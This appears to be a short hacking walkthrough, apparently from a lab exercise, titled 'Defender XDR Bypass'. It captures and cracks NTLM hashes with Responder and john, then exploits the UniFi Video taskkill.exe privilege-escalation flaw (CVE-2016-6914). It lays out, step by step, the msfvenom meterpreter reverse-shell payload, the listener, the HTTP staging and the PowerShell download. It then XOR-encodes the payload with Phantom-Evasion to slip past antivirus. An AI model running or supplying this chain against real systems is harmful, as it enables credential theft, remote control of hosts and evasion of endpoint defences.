•
3 min read
Defender XDR Bypass
  1. Used Responder to setup fake smb server to dump the ntlm hash.

    responder -I eth0

  2. Grabbed the NTLM hash for user, and cracked with john (I haven’t been able to get Hydra OpenGL drivers to work inside a VM)

    john --wordlist=/usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt jason.hash

  3. Used password Passw0rd! via PSWA. Profit.

  4. Checked Documents folder and found a file called unifivideo

UniFi Video is a powerful and flexible, integrated IP video management surveillance system designed to work with Ubiquiti’s UniFi Video Camera product line. UniFi Video has an intuitive, configurable, and feature‑packed user interface with advanced features such as motion detection, auto‑discovery, user-level security, storage management, reporting, and mobile device support.

  1. Exploit-DB search found a Local PrivEsc vulnerability: CVE-2016-6914
    • The UniFi-Video service tries to execute a file called taskkill.exe in C:\ProgramData\unifi-video\, but that file does not exist by default. All users have overridden write permissions to C:\ProgramData\unifi-video, so we can compromise any user, inject a payload named taskkill.exe, and restart the UniFi-Video Service. Since the service runs with Administrator Priveleges, we should get a local Administrator meterpreter_reverse_tcp handler.
  2. Created a payload with msfvenom:
    msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.0.x.x LPORT=1236 -f exe > taskkill.exe
  3. Setup meterpreter_reverse_tcp handler
    use multi/handler
    set payload windows/meterpreter_reverse_tcp
    set LHOST 10.0.x.x
    set LPORT 1236
  4. Stood up HTTP server to host our payload
    python3 -m http.server 8081 --bind 10.0.x.x
  5. Downloaded payload to target via PS
    Invoke-WebRequest -o taskkill.exe http://10.0.x.x:8081/taskkill.exe
  6. Restart the UniFi-Video service:
    Stop-Service "Ubiquiti UniFi Video"
    Start-Service "Ubiquiti UniFi Video"
  7. Checked meterpreter_reverse_tcp handler. But no pwnage :(

Whiskey…Tango…Foxtrot. Lots of keyboard mashing


AV killing my payload

  1. Used phantom evasion
    [1] windows modules
    [1] shellcode injection
    [4] windows shellcode injection heapalloc
    msfvenom payload: windows/meterpreter/reverse_tcp
    [4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)
    No need to strip and sign the payload executable for testing purposes.
  2. Downloaded AV-sneaky version of payload to the target via PS
    Invoke-WebRequest -o taskkill.exe http://10.0.x.x:8081/taskkill.exe
  3. Restart UniFi-Video service:
    Stop-Service "Ubiquiti UniFi Video"
    Start-Service "Ubiquiti UniFi Video"
  4. Checked meterpreter_reverse_tcp handler.

Look mom, I’m a hacker!